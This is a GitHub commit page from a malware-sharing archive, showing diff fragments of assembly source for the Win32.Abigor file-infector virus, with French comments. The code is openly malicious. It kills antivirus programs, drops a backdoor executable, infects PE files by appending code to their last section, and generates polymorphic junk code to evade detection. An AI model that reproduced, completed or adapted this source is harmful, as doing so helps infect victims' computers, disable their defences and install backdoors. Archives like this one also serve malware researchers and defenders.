Rename Win32/Win32.Abigor.ASM to Win32/Infector/Win32.Abigor.ASM

This commit is contained in:
vxunderground 2020-10-28 23:13:34 -05:00 committed by GitHub
parent 59acb78c99
commit 7eaec4c565
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -368,7 +368,7 @@ assume fs:nothing
CAll KillAVz ; après que TIME_DROP soit dépassé detruire les AVs CAll KillAVz ; après que TIME_DROP soit dépassé detruire les AVs
lea eax, dword ptr [ebp + TS_Win] lea eax, dword ptr [ebp + TS_Win]
push eax push eax
@ -376,7 +376,7 @@ assume fs:nothing
lea eax, dword ptr [ebp + szFindWindowA] lea eax, dword ptr [ebp + szFindWindowA]
Call U32Api Call U32Api
or eax, eax or eax, eax
jnz no_drop ; Backdoor déjà implanté sur notre système ? jnz no_drop ; Backdoor déjà implanté sur notre système ?
Call Drop_BackDoor ; non ??? implantons !! Call Drop_BackDoor ; non ??? implantons !!
@ -2733,7 +2733,7 @@ Backdoor db "DABACKDOOR.EXE",0
inc byte ptr [ebp+InfectionCtr] inc byte ptr [ebp+InfectionCtr]
add eax,dword ptr [ebp + pMap] ;eax pointe sur le début de la derniere section add eax,dword ptr [ebp + pMap] ;eax pointe sur le début de la derniere section
add eax,dword ptr [ebp + SizeRelative] ;eax pointe sur la fin de la derniere section add eax,dword ptr [ebp + SizeRelative] ;eax pointe sur la fin de la derniere section
mov edi, eax mov edi, eax
@ -3999,7 +3999,7 @@ Make_Random_Blk proc uses ecx ebx edx esi
Call Push_Pop_blk Call Push_Pop_blk
.ELSEIF eax == 11 .ELSEIF eax == 11
Call MediumBlk Call MediumBlk
.ELSEIF eax > 12 && eax <= 16 ; (trop de détection si ce facteur est trop élevé.) .ELSEIF eax > 12 && eax <= 16 ; (trop de détection si ce facteur est trop élevé.)
Call Branch_blk Call Branch_blk
.ELSEIF eax == 17 .ELSEIF eax == 17
Call MemAccess_blk Call MemAccess_blk
@ -4579,7 +4579,7 @@ SkipDirectCMP:
jmp @Method2 jmp @Method2
@Method1: @Method1:
mov ebx,dword ptr [_LoopOFS] mov ebx,dword ptr [_LoopOFS]
sub ebx,edi ; adresse où sauter sub ebx,edi ; adresse où sauter
xor eax,eax xor eax,eax
@ -4678,7 +4678,7 @@ SkipDirectCMP:
push ebx push ebx
mov edx, edi mov edx, edi
mov ebx,dword ptr [_LoopOFS] mov ebx,dword ptr [_LoopOFS]
sub ebx,edi ; adresse où sauter sub ebx,edi ; adresse où sauter
CALL GEN_JMP_OFS CALL GEN_JMP_OFS
sub edx, edi sub edx, edi
neg edx neg edx
@ -5594,7 +5594,7 @@ ModifyKey proc uses ecx ebx edx
ModifyKey endp ModifyKey endp
;ModifyReg proc uses edx ebx ; Modifie n'importe quel registre puis le restaure (meme un registre réservé) ;ModifyReg proc uses edx ebx ; Modifie n'importe quel registre puis le restaure (meme un registre réservé)
; Call Get2RandRegs ; Call Get2RandRegs
; mov ch, cl ; mov ch, cl
@ -6225,7 +6225,7 @@ InstrTBL dd OFFSET GEN_ADD_REG32_IMM;---
;dd OFFSET GEN_ONEBYTE ;dd OFFSET GEN_ONEBYTE
;dd OFFSET GEN_IMUL_REG32 ; enlevé : change la valeur de EDX ;dd OFFSET GEN_IMUL_REG32 ; enlevé : change la valeur de EDX
;dd OFFSET GEN_MUL_REG32 ;dd OFFSET GEN_MUL_REG32
dd OFFSET GEN_INC_REG8 dd OFFSET GEN_INC_REG8
@ -6242,7 +6242,7 @@ MEMSTART equ $
dd OFFSET GEN_LEA_REG32_DISP32 dd OFFSET GEN_LEA_REG32_DISP32
dd OFFSET GEN_XADD_REG32_REG32 dd OFFSET GEN_XADD_REG32_REG32
dd OFFSET GEN_XCHG_REG32_REG32 ; Ne pas déplacer / do not move this one dd OFFSET GEN_XCHG_REG32_REG32 ; Ne pas déplacer / do not move this one
MEMEND equ $ MEMEND equ $
MEMSTARTNBR = (($ - OFFSET InstrTBL) / 4 ) - (( MEMEND - OFFSET MEMSTART) / 4) MEMSTARTNBR = (($ - OFFSET InstrTBL) / 4 ) - (( MEMEND - OFFSET MEMSTART) / 4)
TOTALNBR = (OFFSET $ - OFFSET InstrTBL) / 4 TOTALNBR = (OFFSET $ - OFFSET InstrTBL) / 4